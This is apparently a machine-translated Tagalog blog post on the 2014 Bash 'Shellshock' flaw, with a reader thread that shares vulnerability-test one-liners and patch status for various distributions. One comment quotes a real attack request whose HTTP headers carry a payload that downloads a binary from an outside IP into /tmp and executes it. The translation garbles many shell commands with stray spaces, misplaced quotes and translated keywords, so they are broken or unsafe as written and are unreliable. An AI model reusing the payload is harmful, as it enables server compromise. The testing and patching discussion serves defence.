Tumatakbo ito tulad ng wildfire sa ilang mga blog, isang item ng balita na nai-publish sa security blog de Red sumbrero tungkol sa isang kahinaan na natagpuan sa Bash dahil sa maling paggamit ng mga global variable. Ayon sa orihinal na balita:
"... Ang kahinaan ay dahil sa ang katunayan na maaari kang lumikha ng mga variable ng kapaligiran na may espesyal na ginawa na mga halaga bago tawagan ang bash shell. Ang mga variable na ito ay maaaring maglaman ng code na naisakatuparan kaagad kapag tinawag ang shell. Ang bagay ng mga detalyadong variable na ito ay hindi mahalaga, ang nilalaman lamang nila. Bilang isang resulta, ang kahinaan na ito ay nakalantad sa maraming mga konteksto, halimbawa:
- ForceCommand ginagamit ito sa mga pagsasaayos ng sshd upang magbigay ng limitadong mga kakayahan sa pagpapatupad ng utos para sa mga malalayong gumagamit. Maaaring gamitin ang kapintasan na ito upang maiwasan iyon at magbigay ng di-makatwirang pagpapatupad ng utos. Ang ilang pagpapatupad ng Git at Subversion ay gumagamit ng mga naturang pinaghihigpitang Shell. Ang regular na paggamit ng OpenSSH ay hindi apektado dahil ang mga gumagamit ay may access na sa isang console.
- Apache server na gumagamit ng mod_cgi o mod_cgid ay apektado kung ang mga script ng CGI ay nakasulat pareho sa bash, o mga spawn sublevel. Ang mga nasabing sublevel ay implicit na ginagamit ng system / popen sa C, ng os.system / os.popen sa Python, kung gumagamit ng system / exec shell sa PHP (kapag tumatakbo sa mode na CGI), at bukas / system sa Perl (na nakasalalay sa command string).
- Ang mga script na PHP na pinapatakbo ng mod_php ay hindi apektado kahit na i-play ang mga sublevel.
- Ang mga kliyente ng DHCP ay nagsumamo ng mga shell script upang mai-configure ang system, na may mga halagang kinuha mula sa isang potensyal na nakakahamak na server. Papayagan nitong maisagawa ang di-makatwirang mga utos, karaniwang bilang ugat, sa makina ng client ng DHCP.
- Ang iba't ibang mga daemon at programa na may mga pribilehiyo ng SUID ay maaaring magpatupad ng mga script ng shell na may mga halaga ng variable ng kapaligiran na itinakda / naiimpluwensyahan ng gumagamit, na magpapahintulot sa mga di-makatwirang utos na maipatupad.
- Anumang iba pang application na nakakabit sa isang shell o nagpapatakbo ng isang shell script tulad ng paggamit ng bash bilang isang interpreter. Ang mga shell script na hindi nag-e-export ng mga variable ay hindi madaling maapektuhan sa problemang ito, kahit na nagpoproseso sila ng hindi pinagkakatiwalaang nilalaman at iimbak ito sa ang mga variable ng shell (kaliwa) at mga sublevel ay bukas.
... "
Paano malalaman kung ang aking Bash ay apektado?
Dahil dito, mayroong isang napaka-simpleng paraan upang malaman kung apektado kami ng kahinaan na ito. Sa katunayan, sumubok ako sa aking mga Antergo at tila wala akong problema. Ang dapat nating gawin ay buksan ang isang terminal at ilagay:
env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok"
Kung lumabas ito sa ganitong paraan wala kaming problema:
env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok" bash: babala: x: hindi pinapansin ang pag-andar kahulugan pagtatangka bash: error import import function kahulugan para sa `x' ito ay isang pagsubok
Kung magkakaiba ang resulta, dapat mong gamitin ang mga channel ng pag-update ng aming ginustong mga pamamahagi upang makita kung nailapat na nila ang patch. So alam mo 😉
Nai-update: Ito ang output mula sa isang katrabaho gamit ang Ubuntu 14:04:
env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok" mahina ito ay isang pagsubok
Tulad ng nakikita mo, sa ngayon ito ay mahina.
Mayroon akong Kubuntu 14.04 mula sa 64 at nakakakuha rin ako:
env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok"
mahina
ito ay isang pagsubok
Na-update ko na, ngunit hindi ito tama. Anong gagawin?
Hintayin silang mag-update. Ang eOS na halimbawa ay nai-update .. 😀
Paano kakaiba, mayroon din akong Kubuntu 14.04
$ env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok"
bash: babala: x: hindi papansin ang pagtatangka ng kahulugan ng pag-andar
bash: error sa pag-import ng kahulugan ng pagpapaandar para sa `x '
ito ay isang pagsubok
Idagdag ko na ang bersyon ng package na "bash" na na-download ngayon ay:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Sa aking kaso, na nagbibigay ng utos, binibigyan lamang ako ng mga sumusunod sa terminal:
>
Gayunpaman, ang biro ay na-update ko si Debian Wheezy at iyon ang itinapon sa akin.
Ang Wheezy ay mahina pa rin sa ikalawang bahagi ng bug, hindi bababa sa hapon (UTC -4: 30) ang problema ay sumusunod pa rin: /
Napatunayan ko lang na pagkatapos maglapat ng isang pag-update kaninang umaga alinman sa Slackware o Debian o Centos ay apektado dahil nakatanggap sila ng kaukulang pag-update.
Ano ang ginagawang mahina pa rin ang Ubuntu sa oras na ito? At sabihin mo sa akin na ligtas ito: D.
Ngunit nasubukan mo na bang i-update ang Ubuntu?
Sa pag-update ngayon ay naayos din nila ito.
OK
Nagbabala ang mga eksperto sa seguridad tungkol sa kahinaan ng 'Bash', maaari itong magdulot ng mas malaking banta sa mga gumagamit ng Linux Software kaysa sa heartbleed na pagkukulang, kung saan maaaring samantalahin ng 'mga hacker' ang isang bug sa Bash upang makontrol ang kumpleto ng isang system.
Si Tod Beardsley, isang manager ng engineering sa cybersecurity firm na Rapid7, ay nagbabala na ang pagkukulang ay na-rate na 10 dahil sa tindi nito, nangangahulugang mayroon itong maximum na epekto, at na-rate na "mababa" para sa pagiging kumplikado ng pagsasamantala, nangangahulugang medyo madali para sa pag-atake ng 'hacker' . Sa pamamagitan ng paggamit ng kahinaan na ito, maaaring potensyal na kontrolin ng mga umaatake ang operating system, ma-access ang lihim na impormasyon, gumawa ng mga pagbabago, atbp. "Sabi ni Beardsley. "Ang sinumang may mga system na sumakop sa Bash ay dapat na mag-apply kaagad ng patch," dagdag niya.
BAGO ANG VULNERABILITY NA ITO NA NAGLALAHAD NG LUMANG TOOL (GNU) kung saan naka-host ang Bach, mas maginhawa para sa Linux Software na mapupuksa ang GNU at baguhin para sa tool ng BSD.
PS: huwag CENSURE ang aking kalayaan sa pagpapahayag, ... hindi ininsulto ang sinuman, ... huwag tanggalin ang aking mensahe tulad ng nakaraang mensahe na tinanggal ko!.
Oh mangyaring huwag lumabis. Paano ko naiinis ang mga taong gumagamit ng BSD at minamaliit ang GNU, Linux o anumang bagay mula sa mga proyektong ito.
Kasama kita at ganap kang tama sa tindi ng butas na ito.
Hindi ito pag-censor, ito ay kalabisan (gumawa ka ng parehong komento sa gnome 3.14 post)
«… At na-rate na 'Mababa' PARA SA KOMPLEKSIDAD ng pagsasamantala, na nangangahulugang ito ay MADALI para sa pag-atake ng hacker»
Kapansin-pansin ba ang hindi pagkakasundo?
Paano madali itong mapagsamantalahan ang kahinaan at sa parehong oras ay may "mababang" antas ng peligro sapagkat napakahirap gamitin?
Ito ay isang bug na nalutas sa loob ng maraming oras ng pagpupulong at iyon, tulad ng heartbleed, ay walang mga ulat na pinagsamantalahan (Siyempre, may kaunting oras na ito upang makilala ang bawat isa).
Ito ay higit na tabloid press kaysa sa tunay na peligro.
Mukha bang hindi mahalaga sa iyo ang @Staff? Ano ang sasabihin mo sa akin ngayon?
GET./.HTTP/1.0
.Gamit ng Ahente: .Salamat-Rob
.Cookie: (). {.:;.};. Wget.-O./tmp/beshhttp://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/beshhttp://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Referer: (). {.:;.};. Wget.-O./tmp/beshhttp://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
. Tanggapin: * / *
$file nginx
nginx: ELF 32-bit LSB maipapatupad, Intel 80386, bersyon 1 (SYSV), statically naka-link, para sa GNU / Linux 2.6.18, hinubaran
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Alam mo ba kung ano iyon? Ng maliit na mapanganib wala ...
Medyo seryoso ang sitwasyon, ngunit mula doon upang sabihin na dapat mong ihinto ang paggamit ng bash para sa isang pagpipilian na BSD, marami na ito, gayon pa man ang pag-update ay naroroon, pindutin ko lang ang pag-update at wala nang iba pa.
Ngayon ang PD, sa palagay ko ito ay higit pa sa isang kasamahan sa @robet, sa palagay ko hindi dito inilalaan ng mga admin ang pagtanggal ng mga komentong ganyan dahil oo, sapagkat, mula nang sumali ako sa pamayanan na ito ay naramdaman ko na iyon at inaasahan kong mananatili sa ganoong paraan.
Pagbati.
Inilagay mo ang eksaktong parehong komento sa dalawang magkakaibang mga post. Kung sinusubukan mong itaguyod ang "pinagmulan" ng kwento, paumanhin, hindi ito ang lugar.
Ang Bash ay nagmula sa Unix (at ang GNU clone nito). Ang mga system na batay sa BSD tulad ng OSX ay apektado din, at ayon sa Genbeta, hindi pa nila ito na-patch. Gayundin, upang ma-access ang Bash kailangan mo ng isang account ng gumagamit, alinman sa lokal o sa pamamagitan ng SSH.
@Mga tauhan:
1.- Ito ay naiuri bilang Antas 10 (maximum na antas ng panganib) dahil sa dami ng mga serbisyo na maaaring maapektuhan ng bug. Sa pangunahing tala ginawa nilang malinaw ang katotohanang iyon, na pinagtatalunan na ang bug ay maaaring makaapekto sa mga serbisyo tulad ng apache, sshd, mga program na may suid na mga pahintulot (xorg, bukod sa iba pa).
2.- Ito ay naiuri bilang Mababang Antas ng Pinagkakahirapan, pagdating sa pagpapatupad nito, at ang pinakamagandang halimbawa nito ay ang script ng pagsubok na kahinaan na inilagay ni @elav sa post. Napakahirap ipatupad ay hindi, tulad ng nakikita mo.
Hindi ko nakikita ang kalabisan sa impormasyon (nakikita ko lamang ang isang pagsasalin sa Google) at kung ang problema ay seryoso, at tulad ng sinabi mo, mayroon na itong patch at isang solusyon, ngunit hindi para doon, hindi na ito peligro, at medyo totoo.
@petercheco / @Yukiteru
Huwag kang magkamali, sa palagay ko malinaw na ang aking pagpuna ay ang balita na nag-link ang Robet at nakatuon sa hindi pagkakasundo at hindi kalabisan.
Sa parehong paraan, dapat nating makilala ang pagkakaiba sa panganib at panganib (hindi ko binabanggit ang huli), karaniwang ginagamit namin ang mga ito bilang mga kasingkahulugan, ngunit dito, ang panganib ay ang kapasidad ng pinsala ng bug at ipagsapalaran ang posibilidad na mangyari ito.
Sa aking partikular na kaso, pumasok ako mula kahapon. Hindi ito para sa mga listahan ng pag-mail o anumang katulad nito. Ito ay para sa isang distro sa desktop! Kinuha ko ang telepono at nagpadala ng mensahe sa sysadmin na may link at nakumpirma kong nasa aking lahat ang na-patch, pagkatapos ay patawarin ako ngunit ang mga balitang ito ay hindi ako ginising.
Sa ibang mga forum binanggit nila ang tungkol sa kahinaan ng Bash, "ang solusyon na pinakawalan ni Debian at Ubuntu", ngunit ngayon natuklasan nila na mayroon pa ring isang kahinaan, kaya't hindi kumpleto ang solusyon, binanggit nila iyon!
Nakita ko na marami ang pinuna sa akin para sa simpleng katotohanan ng pag-iwas sa mga tao mula sa kalubhaan ng kahinaan na pinasadya sa antas na 10 ng maximum na pagiging mapanganib, at binabanggit ang mga posibleng solusyon sa Linux Software bago ang hindi napapanahong tool ng GNU kung saan naka-host ang Bash -na perpektong maaaring GNU mapalitan ng tool na BSD sa Linux Software,… Gumagamit din ako ng Linux at gusto ko ng Linux!
Nilinaw ko na ang Bash ay hindi dumating sa pamamagitan ng default na naka-install sa BSD, isa pa itong package sa pagiging tugma ng Linux na maaaring mai-install sa BSD ... oo!. At ang mapagkukunan ay inilalagay upang maaari nilang suriin ang balita, dahil marami sa mga gumagamit kung minsan ay hindi naniniwala sa mensahe o komento.
robet: Tulad ng sinabi nila sa iyo ng paulit-ulit, inilagay mo na ang iyong komento kasama ang balita sa isang post, hindi mo na kailangang ilagay ito sa bawat post na nagkomento ka.
Sa bash, may iba pang mga shell na maaaring magamit kung sakaling mahina ang Bash. 😉
Robet, na alam ko na walang software na pinagsasama ang linux kernel sa BSD userland. Ang pinakamalapit na bagay ay kabaligtaran, ang kBSD + GNU, tulad ng ginagawa nina Gentoo at Debian. Bukod, ang GNU (1983) ay hindi matawag na "makalumang" kung ito ay pagkatapos ng BSD (1977). Pareho silang nagbabahagi ng kanilang unix root (ngunit hindi ang code), walang "pagkakatugma sa Linux" kung nilikha si Bash noong bata pa si Linus T.
uff, ang pagsubok sa debian sa oras na ito ay "mahina" kung ano ang isang guhit na mayroon tayo ...
Gumagamit ako ng Debian Testing at kahit sa sangay na ito natanggap namin ang bash update
ayon sa genbeta mayroon ding isa pang kahinaan
http://seclists.org/oss-sec/2014/q3/685
ang utos sa query ay
env X = '() {(a) => \' sh -c "mahina ang echo"; bash -c "echo Failure 2 hindi naipadala"
parehas ako.
Parehas dito Ngunit ang orihinal na bug sa post ay na-patch sa (L) Ubuntu 14.04
Sa halip na gumawa ng isang simpleng echo subukang gawin itong isang tagubilin na nangangailangan ng mga pribilehiyo, itinapon ko ang "hindi sapat na mga pribilehiyo" ... ang bug na ito ay hindi nagpapalaki ng mga pribilehiyo? Kung hindi nito nadaragdagan ang mga pribilehiyo kung gayon hindi ito mapanganib na ipininta nila ito.
Tama ka!! sila ay dalawang kahinaan ...
Sa akin sa Linux Mint 17 pagkatapos ng pangalawang pag-update ng bash na inilagay nila sa mga repository ng Ubuntu kagabi, sa pagpapatupad ng utos na iyon ay nag-aalok ang shell ng output na ito:
env X = '() {(a) => \' sh -c "mahina ang echo"; bash -c "echo Fail 2 hindi naipadala"
>
Ang bersyon ng "bassh" na inilagay sa mga repository ng Ubuntu upang mai-update ang mga nauna ay:
4.3-7ubuntu1.2
Sa mga sistemang nagmula sa Debian maaari mong suriin ang naka-install na bersyon gamit ang utos na ito:
dpkg -s bash | Bersyon ng grep
Sa anumang kaso, dapat itong linawin, kahit papaano para sa mga gumagamit ng Debian, Ubuntu at Mint; Hindi ka dapat masyadong mag-alala sa mga program na nagpapatakbo ng mga script na may header na #! / Bin / sh dahil sa mga pamamahagi / bin / sh ay hindi tinatawag na "bash", ngunit nagbubuklod sa shell na "dash" (dash ay :)
Ang Debian Alchemist Console (dash) ay isang nagmula sa POSIX console
ng abo.
.
Dahil mas mabilis itong nagpapatupad ng mga script kaysa sa bash, at may mas kaunting mga dependency
ng mga aklatan (ginagawang mas matibay laban sa mga pagkabigo ng software o
hardware), ginagamit ito bilang default na system console sa mga system
Debian.
Kaya, hindi bababa sa Ubuntu, ang "bash" ay ginagamit bilang isang shell para sa pag-login ng gumagamit (din para sa root user). Ngunit ang sinumang gumagamit ay maaaring gumamit ng ibang shell bilang default para sa gumagamit at mga root console (terminal).
Madaling suriin na ang shell ay nagpapatupad ng mga script (#! / Bin / sh) sa pamamagitan ng pagpapatupad ng mga utos na ito:
file / bin / sh
(ang output ay / bin / sh: simbolikong link sa `dash ') sinusunod namin ang bakas na inuulit ang utos
file / bin / dash
(ang output ay / bin / dash: ELF 64-bit LSB nakabahaging object, x86-64, bersyon 1 (SYSV) kaya't ito ay maipapatupad.
Ito ang mga resulta sa isang pamamahagi ng Linux Mint 17. Sa ibang mga pamamahagi na hindi batay sa Ubuntu / Debian maaari silang magkakaiba.
Hindi mahirap baguhin ang default na shell !! maaari mo ring gamitin ang ibang para sa mga gumagamit at para sa root user. Talagang kailangan mo lamang i-install ang shell na iyong pinili at baguhin ang default gamit ang "chsh" na utos o sa pamamagitan ng pag-edit ng / etc / passwd file (bagaman ang mga gumagamit na hindi alam ang mga kahihinatnan ng isang error kapag na-edit ang file na "passwd", Ito ay mas mahusay na ipaalam nila sa kanilang sarili nang napakahusay at bago ito i-edit, gumawa ng isang kopya ng orihinal kung sakaling kinakailangan itong mabawi).
Mas komportable ako sa "tcsh" (tcsh ay :)
Ang TENEX C console, isang pinabuting bersyon ng Berkeley csh
Ang "Csh" ay ang ginamit ng Mac OS X ilang taon na ang nakalilipas. Isang bagay na lohikal na isinasaalang-alang na ang karamihan sa operating system ng Apple ay FreeBSD code. Ngayon mula sa nabasa ko kahapon, tila nagbibigay din sila ng "bash" para sa mga terminal ng gumagamit.
KONklusyon:
- Ang mga naka-patch na "bash" na bersyon "para sa pinaka ginagamit na mga pamamahagi" ay naipamahagi na
- "bash" na bersyon 4.3-7ubuntu1.2 at sa paglaon ay hindi naglalaman ng mga bug na ito
- Hindi sapilitan na gamitin ang "bash" sa OS * Linux
- Ilang * Mga pamamahagi ng Linux na nag-link ng #! / Bin / sh na may "bash"
- Mayroong mga kahalili: abo, dash, csh, tcsh at ilan pa
- Hindi mahirap baguhin ang default na shell na tinatawag ng system kapag binubuksan ang isang terminal
- Ilang maliliit na aparato (mga router at iba pa) ang gumagamit ng "bash", sapagkat ito ay napakalaki !!
Sa ngayon ay dumating din ang isa pang pag-update na nag-install ng isa pang bersyon ng "bash" 4.3-7ubuntu1.3
Para sa Linux Mint 17 at Ubuntu 14.04.1 LTS
Nagpasok ang ArchLinux ng bersyon bash-4.3.026-1
@ Xurxo… .csh mula sa Berkeley ?. Ang tool na iyon ay ang pinakamahusay para sa Linux Software.
Hulaan ko ito ang bug
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
totoo
At ano ang magiging solusyon?
Hintaying i-update nila ang package sa distro mo 😉
Ang bug ay nabinyagan bilang shellshock
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
mahina
ito ay isang pagsubok
Wala pang patch para sa Ubuntu Studio 14.04
Naayos sa Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok"
bash: babala: x: hindi papansin ang pagtatangka ng kahulugan ng pag-andar
bash: error sa pag-import ng kahulugan ng pagpapaandar para sa `x '
ito ay isang pagsubok
Sa totoo lang ito ay isang menor de edad na kahinaan, kung nakakaapekto ito sa iyo, ito ay ang ginagawa mong mali bago ...
Dahil ang isang bash script na tumatakbo na may mga pribilehiyo ng ugat ay hindi dapat malantad sa isang gumagamit. At kung tatakbo siya nang walang mga pribilehiyo, walang gaanong kakayahang mabuhay. Sa totoo lang, nakakaloko. Karamihan sa scaremongering.
Ganoon rin ang naisip ko.
Sakto, upang magbenta ng maraming pahayagan o makakuha ng maraming mga pagbisita, ang mga bug na ito ay mabuti.
Ngunit palaging nakakalimutan nilang banggitin na upang lumabag sa isang computer sa ganitong uri ng mga script, kailangan mo munang magkaroon ng access sa bash at pagkatapos ay magkaroon ito bilang ugat.
tauhan kung gumagamit ka ng isang apache na may cgi, ilagay lamang sa mga header ng http bilang cookies o referer ang pagpapaandar na nais mong isagawa. Ginamit pa ito upang kumalat ang mga bulate.
at kung ang isang tao ay naglalagay ng isang shell sa isang server na may isang wget mishell.php, sa kasong iyon hindi ito seryoso, hindi ba?
Sumasang-ayon sa iyo. Akala ko ito ay isang napakalaking bug tulad ng sa Heartbleed (kahit na ang NSA ay nagpahiram mismo upang mapalakas ang karamdaman), ngunit pagkatapos ng lahat ito ay isang menor de edad na bug.
Mayroong iba pang talagang seryosong mga bug tulad ng nakatutuwang pagkonsumo ng Flash at pagbagal ng pagganap sa Pepper Flash Player, at ang isa na naayos na webRTC bug sa Chrome at Firefox.
Alam mo ba kung mayroon itong isang pag-aayos para sa mga taong mayroong Linux Mint 16?
Sa pagsubok ng Debian naayos na ito.
Sa aking 5 mga distro nalulutas ito, sa aking OS X hindi ko alam.
Mangyaring, huwag i-censor ang aking komento, sinabi ko ang OS X. Hindi ko alam kung masasabi mo ang OS X sa site na ito.
@yoyo mabuti huwag masyadong mabalita na ginagawa pa rin nila ang ilang mga detalye ng patch ... subukan ito at pagkatapos ay sabihin sa akin kung paano ang XD
env x = '() {:;}; echo mahina 'bash -c "echo mas mahina ako kaysa sa iphone 6 trash"
Na kung nalutas nila ito 100% bago ang OS X may pusta ako
Kaya, kahit sa Ars Technica binibigyan nila ang kaugnayan sa Bash sa OSX.
@Yoyo susunod na puna sa OS X para sa SPAM .. lla tu save .. 😛
@yoyo doon upang ayusin ang mga quote ... ngunit ang natitirang nalalaman mo 😉
Nagsalita na ang FSF
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Tulad ng naging patronizing nila sa OSX (dahil gumagamit pa ang OSX ng Bash: v).
Kahit papaano, hindi ko na kailangang magulo pa si Debian Jessie.
Kung mahina ang system sa Cent OS:
yum malinis lahat && yum update bash
upang makita ang bash bersyon:
rpm -qa | grep bash
Kung ang bersyon ay mas maaga kaysa sa bash-4.1.2-15.el6_5.1 ang iyong system ay maaaring maging mahina!
Pagbati.
Hindi pa nalulutas ang ika-2 kahinaan
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "echo Failure 2 hindi naipadala"
Ina-update ...
Ang kabaligtaran ay nangyayari sa akin sa Gentoo, mahina lamang ako sa unang pagkabigo ngunit sa pangalawa ay nakukuha ko ito:
[code] sh: X: linya 1: error sa syntactic malapit sa hindi inaasahang elemento `= '
sh: X: linya 1: "
sh: error sa pag-import ng kahulugan ng pag-andar para sa `X '
sh: mahina: hindi nahanap ang utos
Ang Bug 2 ay hindi na-patch
[/ code]
Hindi ko alam kung magkakaroon na ng isang matatag na bersyon ng Bash na naayos ang mga bug, ngunit alinman sa paraan ito ay nakabinbin para sa susunod na gumawa ako ng isang emerge –sync && emerge –update –deep –with-bdeps = at - newuse @world (ganoon ang hakbang sa pag-update ko sa buong system).
Mayroon akong Gentoo na may bersyon 4.2_p50 at sa ngayon ay nakapasa ito sa lahat ng mga pagsubok. Subukang umusbong –sync at pagkatapos ay lumabas -av1 app-shell / bash, at pagkatapos suriin na mayroon kang bersyon 4.2_p50 gamit ang bash –version command.
Nasubukan mo na ba ito?
At sa mga bagong pakete, isang bagong pagsubok na ibinibigay sa amin ng Red Hat
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "echo date"; pusa / tmp / echo
Kung ang aming system ay hindi mahina at na-patch nang tama, kailangang bigyan kami nito ng tulad nito
1 petsa
2 cat: / tmp / echo: Ang file o direktoryo ay wala
Subukan sa ganitong paraan:
env X = '() {(a) => \' sh -c "mahina ang echo"; bash -c "echo Failure 2 patch"
nakuha ko
mahina
Nag-patch ang bug 2.
Kalimutan ito, mali ang nai-format na linya.
Magaling! Nagawa ko na ang pag-update sa aking Slackware, salamat!
Kumusta, mayroon akong isang katanungan, mayroon akong maraming mga server na may "SUSE Linux Enterprise Server 10" 64 bits.
Kapag naisagawa ko ang mga utos na mahina ako, mas mahina pa ako kaysa sa basurahan ang iPhone 6 xD
Kung hindi ako nagkakamali na mag-update / mag-install ng mga pakete sa SUSE ay tapos na sa utos na «zypper».
Sa ilang mga server sinabi ito sa akin:
BIAL: ~ # zypper pataas
-bash: zypper: hindi nahanap ang utos
BIAL: ~ #
At sa iba pa ito:
SMB: ~ # zypper pataas
Ipinapanumbalik ang mga mapagkukunan ng system…
Pag-parse ng metadata para sa SUSE Linux Enterprise Server 10 SP2-20100319-161944…
Parsing RPM database ...
buod:
Walang magawa.
Ano ang gagawin ko?
Alam ko na ang ilan ay nagsasabi na ang kahinaan ay mas mababa kaysa sa kung ano ang ipininta nila ito ngunit mayroon ako at hindi ko nais na mailantad sa peligro, maging maliit o malaki.
Pagbati.
Magandang gabi, sinubukan kong i-paste ang code na iyong ibinigay sa artikulo, nakukuha ko ito
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo mahina 'bash -c "echo ito ay isang pagsubok"
ito ay isang pagsubok
sanders @ pc-sanders: ~ $
Maaari mo bang ipaliwanag sa akin kung paano i-patch ang distro, nag-update ako araw-araw at wala akong nakitang anumang mga pagbabago sa agarang output.
Maraming salamat sa inyo!